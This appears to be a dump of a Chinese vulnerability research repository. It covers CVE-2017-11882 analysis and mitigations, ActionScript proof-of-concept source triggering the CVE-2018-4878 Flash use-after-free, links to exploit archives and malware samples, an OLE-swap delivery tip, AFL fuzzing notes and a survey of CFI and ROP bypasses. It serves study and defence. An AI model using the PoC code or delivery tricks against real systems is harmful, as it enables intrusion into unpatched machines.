250 | 251 | 随后的sub_4164FA开始逐个读入字节读入font name的数据,直到遇到一个NULL,如下所示 252 | 253 | char *__cdecl sub_4164FA(char *a1) 254 | { 255 | char *v1; // ST0C_4@1 256 | char *result; // eax@2 257 | 258 | do 259 | { 260 | v1 = a1++; 261 | *v1 = inc_and_get_byte_from_counter_offset(); 262 | } 263 | while ( *v1 ); 264 | result = a1; 265 | *a1 = 0; 266 | return result; 267 | } 268 | 269 | 读入font name后,再调用sub_4214A6函数进行一些处理,由于前面读入的font name数据过长,从而导致在sub_4214A6函数内部再进入几层调用后导致栈溢出 270 | 271 | __int16 __cdecl sub_4214C6(int buffer, int a2) 272 | { 273 | __int16 v3; // [sp+Ch] [bp-8h]@1 274 | int v4; // [sp+10h] [bp-4h]@1 275 | 276 | LongFont_struct_Overflow(buffer, a2, 1, &v4); 277 | v3 = sub_421D5D(v4); 278 | if ( !v3 ) 279 | v3 = sub_421DB8(v4); 280 | sub_42159A(); 281 | return v3; 282 | } 283 | 284 | 285 | 286 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/patch.md: -------------------------------------------------------------------------------- 1 | ## 影响版本 2 | 3 | Office 365 4 | Microsoft Office 2000 5 | Microsoft Office 2003 6 | Microsoft Office 2007 Service Pack 3 7 | Microsoft Office 2010 Service Pack 2 8 | Microsoft Office 2013 Service Pack 1 9 | Microsoft Office 2016 10 | 11 | ## 漏洞动态检测及防御 12 | ### 0x00 13 | 14 | 该漏洞的动态防御特别简单,因为是栈缓冲区拷贝时溢出,所以校验待拷贝长度是否超过缓冲区的长度即可,微软在补丁里面把溢出校验长度设置为0x20,比实际少4个字节,可能为了保险起见吧。 15 | 16 | ### 0x01 17 | 18 | (1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补 19 | 20 | (2)开启Windows Update功能,定期对系统进行自动更新 21 | 22 | (3)在注册表中禁用该漏洞模块 23 | 24 | reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 25 | 26 | reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400 27 | 28 | 
-------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/skills.md: -------------------------------------------------------------------------------- 1 | ## 修改过的ole替换正常的ole 2 | 1.对于word 3 | 4 | 对一个docx文件来说,就是用压缩软件替换 5 | 6 | word/embeddings/oleObject1.bin 7 | 8 | 这个文件,然后重新保存成docx即可 9 | 10 | 2.对于rtf 11 | 12 | ...不知道 13 | 14 | ## WinDbg调试器:启动程序时自动连接调试器方法 15 | 16 | 第一步:注册表展开到**HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options**路径下; 17 | 18 | 第二步:在**Image File Execution Options**上鼠标右键,新建“项”,项名为你要调试的程序,比如我调试QQ,那就把项名改为qq.exe; 19 | 20 | 第三步:在项名上,右键,新建字符串值**“Debugger”**,然后双击“Debugger”字符串值,输入Windbg完整目录即可; 21 | 22 | 此时,你启动qq时,会直接启动windbg附加 23 | 24 | ## 各式工具 25 | 26 | oleviewdotnet:本机所实现的OLE/COM对象查看器 .net版本 27 | https://github.com/tyranid/oleviewdotnet 28 | 29 | oletools:将rtf中的ole对象分离出来等等 30 | https://github.com/decalage2/oletools 31 | 32 | GUID-Finder:ida插件,可自动分析可执行文件实现的OLE/COM接口 33 | https://github.com/nihilus/GUID-Finder 34 | 35 | OleFileView:可视化界面查看ole对象各项的的16进制 36 | https://github.com/moonAgirl/Exploit/tree/master/CVE-2017-11882/OleFileView.zip 37 | 38 | 39 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/CVE-2018-4878-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/CVE-2018-4878-master.zip -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/CVE-2018-4878.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/CVE-2018-4878.rar 
-------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/CVE-2018-4878漏洞分析.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/CVE-2018-4878漏洞分析.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/Poc.as3proj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 58 | 59 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/Poc.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/bin/Poc.swf -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/expressInstall.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/bin/expressInstall.swf -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Poc 6 | 7 | 8 | 9 | 29 | 33 | 34 | 35 |
36 |

Poc

37 |

Get Adobe Flash player

38 |
39 | 40 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/obj/PocConfig.old: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 25.0 6 | false 7 | true 8 | 9 | 10 | CONFIG::debug 11 | true 12 | 13 | 14 | CONFIG::release 15 | false 16 | 17 | 18 | CONFIG::timeStamp 19 | '2018/3/15' 20 | 21 | 22 | CONFIG::air 23 | false 24 | 25 | 26 | CONFIG::mobile 27 | false 28 | 29 | 30 | CONFIG::desktop 31 | false 32 | 33 | true 34 | 35 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src 36 | E:\专业软件\FlashDevelop-5.3.3\Library\AS3\classes 37 | 38 | 39 | 40 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src\Poc\Main.as 41 | 42 | #FFFFFF 43 | 30 44 | 45 | 800 46 | 600 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/obj/PocConfig.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 25.0 6 | false 7 | true 8 | 9 | 10 | CONFIG::debug 11 | true 12 | 13 | 14 | CONFIG::release 15 | false 16 | 17 | 18 | CONFIG::timeStamp 19 | '2018/3/15' 20 | 21 | 22 | CONFIG::air 23 | false 24 | 25 | 26 | CONFIG::mobile 27 | false 28 | 29 | 30 | CONFIG::desktop 31 | false 32 | 33 | true 34 | 35 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src 36 | E:\专业软件\FlashDevelop-5.3.3\Library\AS3\classes 37 | 38 | 39 | 40 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src\Poc\Main.as 41 | 42 | #FFFFFF 43 | 30 44 | 45 | 800 46 | 600 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/src/Poc/Main.as: -------------------------------------------------------------------------------- 1 | package Poc 2 | { 3 | import flash.display.FrameLabel; 4 | import flash.display.Sprite; 5 | import flash.events.Event; 6 | import com.adobe.tvsdk.mediacore.*; 7 | import flash.events.TimerEvent; 8 | import flash.net.LocalConnection; 9 | 
import flash.utils.ByteArray; 10 | import flash.external.ExternalInterface; 11 | import flash.utils.Timer; 12 | import flash.text.TextField; 13 | 14 | /** 15 | * ... 16 | * @author 五千年木 17 | */ 18 | public class Main extends Sprite 19 | { 20 | var danglingpointer :MyListener = null; 21 | var mediaplayer :MediaPlayer = null; 22 | var listener :MyListener = null; 23 | var timer :Timer = null; 24 | 25 | // Used to trigger UAF 26 | public function triggeruaf() : void { 27 | var sdk :PSDK = null; 28 | var dispatch:PSDKEventDispatcher = null; 29 | 30 | sdk = PSDK.pSDK; 31 | dispatch = sdk.createDispatcher(); 32 | 33 | this.mediaplayer = sdk.createMediaPlayer(dispatch); 34 | this.listener = new MyListener(); 35 | this.mediaplayer.drmManager.initialize(this.listener); 36 | this.listener = null; 37 | } 38 | 39 | 40 | public function exploit():void { 41 | 42 | this.triggeruaf(); 43 | 44 | try { 45 | new LocalConnection().connect("test"); 46 | new LocalConnection().connect("test"); 47 | } catch (e:Error) { 48 | } 49 | } 50 | 51 | 52 | public function Main() 53 | { 54 | if (stage) init(); 55 | else addEventListener(Event.ADDED_TO_STAGE, init); 56 | } 57 | 58 | private var log :TextField = new TextField(); 59 | public function AddToLog(text :String) : void { 60 | this.log.text += "\n" + text; 61 | } 62 | private function init(e:Event = null):void 63 | { 64 | removeEventListener(Event.ADDED_TO_STAGE, init); 65 | // entry point 66 | this.log.width = 400; 67 | this.log.height = 1500; 68 | this.log.x = 0; 69 | this.log.y = 0; 70 | this.addChild(this.log); 71 | 72 | AddToLog("CVE-2018-4878 POC, by 五千年木\n"); 73 | 74 | exploit(); 75 | return; 76 | } 77 | 78 | } 79 | 80 | } -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/src/Poc/MyListener.as: -------------------------------------------------------------------------------- 1 | package Poc 2 | { 3 | import 
com.adobe.tvsdk.mediacore.DRMOperationCompleteListener; 4 | import flash.utils.ByteArray; 5 | /** 6 | * ... 7 | * @author 五千年木 8 | */ 9 | public class MyListener implements DRMOperationCompleteListener 10 | { 11 | var a1:uint = 0x31337; 12 | var a2:uint = 0x31337; 13 | var a3:uint = 0x31337; 14 | var a4:uint = 0x31337; 15 | var a5:uint = 0x31337; 16 | var a6:uint = 0x31337; 17 | var a7:uint = 0x31337; 18 | var a8:uint = 0x31337; 19 | var a9:uint = 0x31337; 20 | var a10:uint = 0x31337; 21 | var a11:uint = 0x31337; 22 | var a12:uint = 0x31337; 23 | var a13:uint = 0x31337; 24 | var a14:uint = 0x31337; 25 | var a15:uint = 0x31337; 26 | var a16:uint = 0x31337; 27 | var a17:uint = 0x31337; 28 | var a18:uint = 0x31337; 29 | var a19:uint = 0x31337; 30 | var a20:uint = 0x31337; 31 | var a21:uint = 0x31337; 32 | var a22:uint = 0x31337; 33 | var a23:uint = 0x31337; 34 | var a24:uint = 0x31337; 35 | var a25:uint = 0x31337; 36 | var a26:uint = 0x31337; 37 | var a27:uint = 0x31337; 38 | var a28:uint = 0x31337; 39 | var a29:uint = 0x31337; 40 | var a30:uint = 0x31337; 41 | var a31:uint = 0x31337; 42 | var a32:uint = 0x31337; 43 | var a33:uint = 0x31337; 44 | var a34:uint = 0x31337; 45 | public function MyListener() 46 | { 47 | super(); 48 | } 49 | public function onDRMOperationComplete():void { 50 | trace("IN COMPLETE"); 51 | } 52 | 53 | public function onDRMError(major:uint, minor:uint, errorString:String, errorServerUrl:String):void { 54 | trace("IN ERROR"); 55 | } 56 | } 57 | 58 | } -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | poc 4 | 5 | public function triggeruaf() : void { 6 | 7 | var sdk :PSDK = null; 8 | 9 | var dispatch:PSDKEventDispatcher = null; 10 | 11 | 12 | sdk = PSDK.pSDK; 13 | 14 | dispatch = sdk.createDispatcher(); 15 | 16 | 17 | this.mediaplayer = 
sdk.createMediaPlayer(dispatch); 18 | 19 | this.listener = new MyListener(); 20 | 21 | this.mediaplayer.drmManager.initialize(this.listener); 22 | 23 | this.listener = null; 24 | 25 | } 26 | 27 | 28 | public function exploit():void { 29 | 30 | this.triggeruaf(); 31 | 32 | try { 33 | 34 | new LocalConnection().connect("test"); 35 | 36 | new LocalConnection().connect("test"); 37 | 38 | } catch (e:Error) { 39 | 40 | } 41 | 42 | } 43 | 44 | 在this.listener对象free之后,this.mediaplayer对象中还存着它的指针,存在悬挂指针漏洞 -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip -------------------------------------------------------------------------------- /Fuzzer/AFL初探.md: -------------------------------------------------------------------------------- 1 | ## 原理 2 | 3 | AFL采用代码插桩的方法,对遗传算法进行指导,提高代码覆盖率。具体说来,插桩代码把当前地址放到一个全局变量中,类似一个hashmap的地图,设置遗传算法,能够产生不同路径的地图优先度高。 4 | 5 | 对中afl-gcc编译的crash可执行文件的反汇编,可以看到有一些__afl_maybe_log插桩代码。 6 | 7 | ## AFL工作流程 8 | 9 | Fuzz流程: 10 | 11 | 1.读取输入的初始testcase, 将其放入到queue中; 12 | 2.从queue中读取内容作为程序输入; 13 | 3.尝试在不影响流程的情况下精简输入; 14 | 4.对输入进行自动突变; 15 | 5.如果突变后的输入能够有新的状态转移,将修改后的输入放入queue中; 16 | 6.回到2。 17 | 18 | ## 对代码进行插桩 19 | 20 | 在使用AFL 编译工具 afl-gcc对源码进行编译时,程序会使用afl-as工具对编译并未汇编的c/c++代码进行插桩。过程如下: 21 | 22 | 1.afl-as.h定义了被插入代码中的汇编代码; 23 | 2.afl-as逐步分析.s文件(汇编代码),检测代码特征并插入桩。 24 | 25 | 过程如下图所示: 26 | 27 | ![](./afl1.png) 28 | 29 | 过程描述: 30 | 31 | 1.编译预处理程序对源文件进行预处理,生成预处理文件(.i文件) 32 | 2.编译插桩程序对.i文件进行编译,生成汇编文件(.s文件),afl同时完成插桩 33 | 3.汇编程序(as)对.s文件进行汇编,生成目标文件(.o文件) 34 | 4.链接程序(ld)对.o文件进行连接,生成可执行文件(.out/.elf文件) 35 | 36 | 当然llvm/clang插桩方式是另外的一套机制,通过修改LLVM IR(中间语言)实现。 37 | 38 | ## 
AFL编译程序 39 | 40 | $ CC=/path/to/afl/afl-gcc ./configure 41 | $ make clean all C++ 程序, 设置 CXX=/path/to/afl/afl-g++. 42 | 43 | AFL编译链接可执行文件和库文件时,建议使用static link(静态链接库,libxxx.a文件),当使用动态链接库时,将动态链接库(如当前目录)加到环境变量中:export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:. 44 | 45 | ## 选择初始化用例 46 | 47 | 1.保证文件足够小,fuzzing测试速度不至于太慢; 48 | 2.选取不同的testcase时,选取不同类型的testcase。 49 | 3.使用afl-cmin精简testcase 50 | 51 | 如果测试用例导致afl-fuzz速度慢,可以使用LLVM-based mode(compile with clang),可以提速两倍,或者使用 -d option 52 | 53 | ## Fuzzing Binaries 54 | 55 | ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ 56 | 57 | -m 设置内存限制,当不限内存时,set -m none 58 | -f xxx 当一个程序读取文件名固定时,set -f xxx(xxx为文件名) 59 | -t 当fuzzing的程序数据交互时间较长,set -t xxx(xxx为超时时间) 60 | 61 | ## 输出目录说明 62 | 63 | queue/ - 每个独特执行路径的测试用例,以及用户给出的所有起始文件。这是第2节中提到的合成语料库。在将此语料库用于任何其他用途之前, 64 | 可以使用afl-cmin工具将其缩小为较小的大小。该工具将找到提供等效边缘覆盖率的较小文件子集。 65 | 66 | crashes / - 导致测试程序收到致命信号的独特测试用例(例如,SIGSEGV,SIGILL,SIGABRT)。条目按接收到的信号分组。 67 | 68 | hangs/ - 导致测试程序超时的唯一测试用例。在东西被分类为挂起之前的默认时间限制是1秒和-t参数的值中较大的一个。该值可以通过设置AFL_HANG_TMOUT 69 | 进行微调,但这很少需要。 70 | 71 | 在crash文件夹,找到令程序崩溃的输入。 72 | 73 | 如果需要重新开始AFL Fuzzing时,删除output文件夹,或者指定另外的输出文件夹 74 | 如果需要继续已经停止的AFL Fuzzing测试,使用 afl-fuzz -i-(如:./afl-fuzz -i- -o findings_dir /path/to/program @@)来继续Fuzzing。 75 | 76 | ## 并行Fuzzing测试 77 | 78 | 每个afl-fuzz进程占据CPU的一个核,也就是说如果是多核的主机,AFL就可以并行工作,并行模式也为AFL与其他Fuzzing工具、符号执行引擎(symbolic or concolic execution engines)交互提供了便利。 79 | 80 | ## 验证Crash 81 | 82 | 如果程序Fuzzing过程发生crash,那么会在afl/output/crash文件夹下记录引发crash的输入文件,使用gdb单步调试可以定位引发崩溃的代码位置。但是有些比较复杂的程序利用gdb可能比较难定位问题,使用-C option。 83 | 84 | ## LLVM Mode 85 | 86 | LLVM Mode(afl-clang)模式编译程序Fuzzing速度是afl-gcc模式的2倍,但是使用此模式必须先安装llvm套件,参见learning LLVM project — clang,配置LLVM_CONFIG(export LLVM_CONFIG=`which llvm-config`),然后在afl/llvm_mode/文件夹下执行make,会在afl/目录下生成afl-clang-fast/afl-clang-fast++。 使用afl-clang-fast编译C程序: 87 | 88 | $CC=/path/to/afl/afl-clang-fast ./configure [...options...] 
89 | $make 90 | 91 | 最后还是会调用clang/clang++来编译程序,在编译程序时会检查编译选项(makefile中的CFLAGS),clang提供很多内存检查的工具如ASAN/MSAN/UBSAN等,以及afl编译选项AFL_QUIET(Qemu模式),这些选项可以直接填写进makefile的编译选项也可以设置到环境变量中,afl-gcc/afl-clang在开始编译前会检查这些环境变量。 92 | 93 | 环境变量设置详情见:env_variables.txt 94 | 95 | ## ASAN结合使用 96 | 97 | ASAN/MSAN/UBSAN原本输入clang编译器选项,后来在高版本的gcc中集成。在发现内存问题中ASAN/MSAN/UBSAN发挥着重要的作用。有大牛表示:“AFL Fuzzing without ASAN is just a waste of CPU”。 98 | 99 | 使用ASAN方法: 100 | 101 | set AFL_USE_ASAN=1 before calling ‘make clean all’ 102 | add -fsanitize=address option into makefile 103 | 104 | 使用ASAN编译选项尽量编译成32位系统程序(-m32), 因为Address Sanitize使用Shadow Memory机制,在32机器上需要大约800M的内存,但是在x86_64系统上需要大约20TB的内存。 105 | 106 | ## Qemu Mode 107 | 108 | 在无源码的情况下Fuzzing二进制文件,详细请参见afl/qemu_mode/README.qemu 109 | 110 | ## 总结 111 | 112 | AFL许多技术细节很有意思,设计思想也很巧妙,灵活使用必定能发现很多漏洞。本文多次提到ASAN/MSAN等工具,后续将更加详细讲解AFL+ASAN结合使用,此乃当前白盒测试领域的神器。 113 | 114 | 115 | ## persistent mode 116 | 117 | The LLVM mode also offers a “persistent”, in-process fuzzing mode that can work well for certain types of self-contained libraries, and for fast targets, can offer performance gains up to 5-10x; and a “deferred fork server” mode that can offer huge benefits for programs with high startup overhead. Both modes require you to edit the source code of the fuzzed program, but the changes often amount to just strategically placing a single line or two. 118 | 119 | ## 持久化模式 120 | 121 | Some libraries provide APIs that are stateless, or whose state can be reset in between processing different input files. When such a reset is performed, a single long-lived process can be reused to try out multiple test cases, eliminating the need for repeated fork() calls and the associated OS overhead. 122 | 123 | The basic structure of the program that does this would be: 124 | 125 | while (__AFL_LOOP(1000)) { 126 | 127 | /* Read input data. */ 128 | /* Call library code to be fuzzed. */ 129 | /* Reset state. 
*/ 130 | 131 | } 132 | 133 | /* Exit normally */ 134 | 135 | The numerical value specified within the loop controls the maximum number of iterations before AFL will restart the process from scratch. This minimizes the impact of memory leaks and similar glitches; 1000 is a good starting point, and going much higher increases the likelihood of hiccups without giving you any real performance benefits. -------------------------------------------------------------------------------- /Fuzzer/afl1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/afl1.png -------------------------------------------------------------------------------- /Fuzzer/eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf -------------------------------------------------------------------------------- /Fuzzer/post_fuzzing-reader-wtf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/post_fuzzing-reader-wtf.png -------------------------------------------------------------------------------- /Fuzzer/the_art_of_fuzzing_slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/the_art_of_fuzzing_slides.pdf -------------------------------------------------------------------------------- /History/CFI/CFI.md: -------------------------------------------------------------------------------- 1 | ## ref: 2 | 3 | 
https://hacpai.com/article/1525755052437(控制流完整性(CFI)发展简述) 4 | https://hacpai.com/article/1524800332729 (Data-Oriented Programming) 5 | http://jcs.iie.ac.cn/ch/reader/create_pdf.aspx?file_no=20170407&year_id=2017&quarter_id=4&falg=1(内存数据污染攻击和防御综述) 6 | 7 | ### CFI(控制流完整性) 8 | 9 | 控制流完整性 CFI 的核心思想是依据静态分析,获得程序的控制流图(Control-Flow Graph, CFG), 计算出所有和控制流相关的数据, 即间接转移指令合法的目的地址, 然后通过二进制重写技术在 CFG路径上添加标记, 最后严格要求程序依照 CFG 执行 10 | 11 | ### CPI(代码指针完整性) 12 | 13 | 代码指针完整性 CPI 的核心思想是把进程的内存空间划分为安全区域和常规区域, 敏感的指针数据存放在安全区中, 只有安全的指针操作才能访问安全区的规则, 以此达到保护敏感指针数据不被劫持的目的 14 | 15 | CPI 的实现方法是通过源码的插桩技术,在编译时分析出程序需要保护的敏感指针对象, 并把这些敏感指针替换为符合 CPI 要求的安全指针, 16 | 再使用安全指针去访问安全的内存区域。作者同时还提出了一种条件相对宽松的机制, 代码指针分离(Code-Pointer Separation, CPS),它减少了安全区域的大小以及敏感代码指针的数量和质量, 因此大大降低了开销。 17 | 18 | ## 传统代码重用攻击 VS 基于特征的启发式防御 19 | 20 | 基于特征的启发式防御 21 | 22 | ### 基于指令执行特征检测的防御思想 23 | 24 | 基于统计规律和启发式学习来判断程序运行过程中的配件数量是否超过一定的阈值, 以 25 | 此区分程序的正常或攻击行为。文章的核心思想是首先识别 Ret 指令, 然后判断它的目的地址是否指向 26 | 系统中的 libc 库, 除此之外还要记录从 Ret 指令目的地址开始的连续配件数量以及每个配件包含的指令 27 | 条数, 用上面的统计结果来检测程序是否运行了ROP 恶意代码。 28 | 29 | ### 影子栈(Shadow Stack) 30 | 31 | 影子栈的核心思想是每次程序执行 call 指令时, 除了把函数返回地址压栈外, 额外 32 | 再复制一份返回地址存入可信的影子栈中, 每次栈顶执行 Ret 指令时, 需要先比较常规栈和影子栈的栈 33 | 顶值是否相同, 如果不相同则表示为异常行为并终止程序执行。 34 | 35 | 影子栈主要问题在于无法防御JOP 攻击, 原因在于 JOP 使用的攻击配件是以 Jmp指令为结尾的指令片段。除此之外, 还必须保证影子栈作为可信基的前提, 一旦影子栈中的内容被篡改,攻击者也就能够绕过检测机制了. 
36 | 37 | ### 使用加锁(locking)结合 CFI的思想 38 | 39 | 使用加锁(locking)结合 CFI的思想来弥补影子栈的不足同时又降低 CFI 的性能开销。在编译时添加锁信息相 40 | 关的段(section), 在链接时构造函数调用关系图, 在执行间接分支指令前根据锁的状态值和函数调用关系图来决定是否违反策略。 41 | 42 | ### 指令进行对齐 43 | 44 | 认为程序控制流被劫持的部分原因在于x86 指令集较为紧密, 没有进行对齐处理, 就导致了从不同的位置读取字节, 得到的指令不一样, 于是 45 | 就产生了无意识配件 46 | 47 | 通过修改编译器, 强制将指令进行对齐, 从而使生成的二进制代码中不包括无意识配件。 48 | 49 | ### 计算间接分支指令的密度 50 | 51 | 通过计算间接分支指令的密度来检测ROP攻击的方法,结果显示 ROP 攻击程序中确实存在较高的间接分支 52 | 指令密度, 就文章中的 benchmarks 来说, 可以确定一个通用的阈值为每 32 条指令中存在 13 条以上的 53 | 间接指令, 则认定为恶意攻击的发生 54 | 55 | ## CFI 发展 VS 新型重用攻击 56 | 57 | CFI 发展 58 | 59 | ### CCFIR 60 | 61 | CCFIR是一种对粗粒度 CFI 思想的软件实现方案。首先通过重定位表来分析每个模块中所有间 62 | 接分支指令的可能目的地址集合, 然后重写二进制文件增加一个跳转代码段(segment), 最后在程序运 63 | 行时, 要求所有的间接转移指令转向这个跳转代码段, 再完成控制流的转移, 跳转代码段会去判断这 64 | 些间接转移指令的目标地址是否在合法的集合内,如果不在就认为是异常情况。 65 | 66 | 系统策略从控制转移指令的角度分为三类: 67 | 第一, 间接Call和Jmp指令强制规定只能跳转到函数的开头, 并且目标地址都使用 8 字节对齐, 以此最大可能地消除无意识配件的存在; 68 | 第二, 常规函数不能调用系统敏感函数的地址, 但敏感函数可以调用常规函数的地址; 69 | 第三, 跳转代码段需要通过随机化的方式, 在载入内存时隐藏地址布局。 70 | 71 | ### ROPGuard 72 | 73 | ROPGuard提出在敏感系统调用(例如 mprotect(), execve(), bind()等)触发时, 基于 74 | 一些启发式算法, 动态监控 ROP 的攻击特征, 从而判断是否存在异常情况 75 | 76 | ### KBouncer 77 | 78 | KBouncer是首次提出使用 intel 处理器自带硬件机制的防御思想, 这个硬件 79 | 机制就是最近分支记录(Last Branch Recording, LBR),它是一种循环寄存器组, 可以记录程序最近的十六 80 | 条跳转指令信息, 并且它的定制性很强, 可以过滤掉不重要的分支而只关注重点的跳转。KBouncer 只 81 | 检查最近十六个执行系统调用的分支信息, 82 | 83 | 然后设定两个规则: 84 | 其一是 Ret 指令的返回地址必须是call-preceded 地址, 85 | 其二是检查最近 8 个间接分支指令是否具备配件的特征, 违反任意一种都会被认为是攻击行为 86 | 87 | ### ROPecker 88 | 89 | ROPecker是一种通用, 不需要源码,且非常高效的防御机制, 它不仅能防御 ROP 形式的 90 | 攻击, 还能抵御 JOP 攻击。ROPecker 首先对程序进行离线的分析, 并使用硬件 LBR 寄存器记录执行流 91 | 的分支信息, 然后依据攻击行为通常会在代码段进行大幅度跳转的特性, 在程序运行时使用滑动窗口 92 | (sliding window)的思想限制分支指令的跳转距离,即不在当前窗口范围内的代码变为不可执行状态, 93 | 一旦分支指令跳转到窗口以外的地址便会触发分析例程, 而分析例程会基于离线的配件统计结果, 对 94 | 有风险的指令片段(十一个连续的配件被认为是危险的)进行报警处理。 95 | 96 | 新型重用攻击 97 | 98 | ### 有效绕过粗粒度 CFI 的 ROP 攻击方法 99 | 100 | 第一,call-precededROP:在不违反call-preceded原则的情况下仍然可以实现ROP攻击,它只用call-preceded 101 | 配件,并且让配件序列变得复杂冗长,使得可以满足执行Ret指令之后跳转到一个call-preceded指令的地址; 
102 | 第二, 躲避攻击(Evasion Attacks)在配件序列中添加一些 NOP 指令, 从而伪装成正常的指令串那么就可以构造长短结合的配件来绕过基于配件长 103 | 度特征的防御检测 104 | 第三是刷新历史记录攻击(History Flushing), 既然一些防御方法是依据程序中分支指令执行的历史信息来检查未来执行流是否异 105 | 常, 那么就可以通过添加NOP指令(无关的间接Jmp)使得防御机制无法维持有效的历史记录, 从而绕过检查策略。 106 | 107 | 结合以上三种攻击方法, 就可以有效绕过CCFIR、DROP、ROPDfender、KBouncer、ROPekcer等基于启发式或粗粒度 CFI 思想的防御机制。 108 | 109 | 防御机制升级 110 | 111 | ### PathArmor 112 | 113 | 即 CFI 的思想结合上下文敏感的关系来增强防御能力。根据程序上下文敏感的静态分析 114 | 和二进制插桩技术, 在目标文件的控制流路径中添加上下文敏感的控制流标记, 把控制流标记和 CFG 115 | 中的控制流关系联系在一起, 展示了一个可应用于实际程序高效且上下文敏感的 CFI 方案 116 | 117 | ### Lockdown 118 | 119 | 提出了二进制级别的细粒度, 模块化, 动态 CFI 原型系统 Lockdown, 使用共享库的符号表和 CFG, 使用 120 | 更为细致的前向控制流转移规则以及影子栈的后向转移保护, 以此来防御所有类型的代码重用攻击。 121 | 122 | 细粒度 CFI 的弱点 123 | 124 | 第一, 当发生函数调用时, 调用函数会将当前使用到的寄存器值压入栈中, 以便函数返回时还原现场, 125 | 于是就给攻击者提供了机会, 如果他们能够篡改栈上保存的寄存器的值, 那么系统还原现场后就会导致 CFI 的检测失效; 126 | 第二, 用户态的 CFI 仅仅插桩用户模式的函数调用, 而不涉及系统内核的函数调用,当一个系统调用返回时, 内核会从用户栈上读取返 127 | 回地址, 然后跳转到用户代码的执行位置, 但是 CFI并不会去检测这个返回值, 因此存在被攻击得可能。 128 | 一条线程连续地进行系统调用, 另外一条线程持续地修改系统调用的返回地址, 就可以完成劫持的目的; 129 | 第三, 影子栈和常规栈之间存在一个常数偏移量, 因此攻击者可以通过任意地址写漏洞, 在常规栈基址的基础上, 计算得出影子栈的地址, 从而篡 130 | 改影子栈的数据来绕过 CFI 检测。 131 | 132 | ### ACICS 133 | 134 | 一种控制流劫持攻击的新型配件, 称之为 ACICS(argument corruptible indirect call sites)配件, 它是由 135 | 成对的间接函数调用指令以及能够启用远程执行代码的函数组成, 同时又符合源程序的 